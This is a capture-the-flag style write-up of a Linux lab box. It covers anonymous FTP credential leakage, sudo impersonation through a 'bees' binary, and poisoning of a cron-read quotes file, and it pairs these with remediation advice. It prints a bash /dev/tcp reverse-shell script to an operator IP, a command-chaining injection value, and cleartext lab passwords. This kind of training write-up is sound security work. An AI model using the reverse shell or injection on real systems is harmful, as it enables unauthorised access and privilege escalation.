Case file

FTP base64 credential, sudo bees pivot, and cron quotes reverse shell

Foundations Linux engagement: anonymous FTP yielded a base64-encoded personal password for Weston; sudo bees impersonated Cage; a world-writable cron quotes file delivered a reverse shell and root mailbox credentials.

Foundations22 minFTP · Privilege Escalation · Cron · Credential Recovery
  • Anonymous FTP leaked Weston’s passphrase; bees sudo granted Cage; cron-fed .quotes executed operator reverse shell; root reused a mailbox password from email backups.

  • Retrieved dad_tasks, base64-decoded Weston’s passphrase, authenticated over SSH.

  • Impersonated Cage via bees; poisoned .quotes for reverse shell; recovered root password from email_backup.

01

Engagement summary

Anonymous FTP leaked Weston’s passphrase; bees sudo granted Cage; cron-fed .quotes executed operator reverse shell; root reused a mailbox password from email backups.

BREAK OUT THE CAGE hosted FTP, SSH, and a novelty agent narrative. Nmap showed the expected surface. Anonymous FTP offered dad_tasks — a base64 blob that decoded to Weston’s SSH password. Locally, sudo -l allowed /usr/bin/bees as Cage without a password. Under Cage we found /opt/.dads_scripts/spread_the_quotes.py reading .files/.quotes on a schedule. Overwriting .quotes with a command-chained reverse shell caught user context, then Super_Duper_Checklist and email_backup disclosed root’s password (cageisnotalegend). Full host compromise from anonymous FTP to root mailbox reuse.

Business impact

Public file shares that hold personal notes become credential stores. Passwordless sudo to utility binaries and writable cron inputs are reliable privilege-escalation paths. Root passwords in mail archives turn local footholds into domain-ready secrets.

02

Anonymous FTP and Weston SSH

Retrieved dad_tasks, base64-decoded Weston’s passphrase, authenticated over SSH.

OPERATOR · FTP / SSH

savvy@lab:~$ nmap -sC -sV 10.10.10.10

21/tcp open ftp 22/tcp open ssh

savvy@lab:~$ ftp 10.10.10.10

Anonymous login OK — get dad_tasks

savvy@lab:~$ base64 -d dad_tasks

Mydadisghostrideraintthatcoolnocausehesonfirejokes

savvy@lab:~$ ssh weston@10.10.10.10

weston@10.10.10.10's password: ******** savvy@lab:~$

Remediation

Disable anonymous FTP or restrict to sterile drop zones. Never store live passwords in shareable notes, even obfuscated. Prefer SSH keys and rotate any secret that appeared in cleartext archives.

03

sudo bees, cron quotes implant, root mailbox

Impersonated Cage via bees; poisoned .quotes for reverse shell; recovered root password from email_backup.

OPERATOR · PRIVESC

savvy@lab:~$ sudo -l

(cage) NOPASSWD: /usr/bin/bees

savvy@lab:~$ sudo -u cage /usr/bin/bees

cage shell — /opt/.dads_scripts/spread_the_quotes.py

savvy@lab:~$ printf 'x;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/.quotes

cron fires → reverse shell as cage

savvy@lab:~$ cat email_backup/email_1

root password hint recovered → su root

root@lab:~# id

uid=0(root) gid=0(root)

IMPLANT

shell.sh

#!/bin/bash
bash -i >& /dev/tcp/10.9.0.54/4444 0>&1

Remediation

Avoid NOPASSWD sudo on interactive or poorly constrained binaries. Treat cron-fed data files as code — root-owned, mode 644, no user write. Scrub mailboxes and home backups for password reuse; enforce unique root secrets via vaulted break-glass accounts.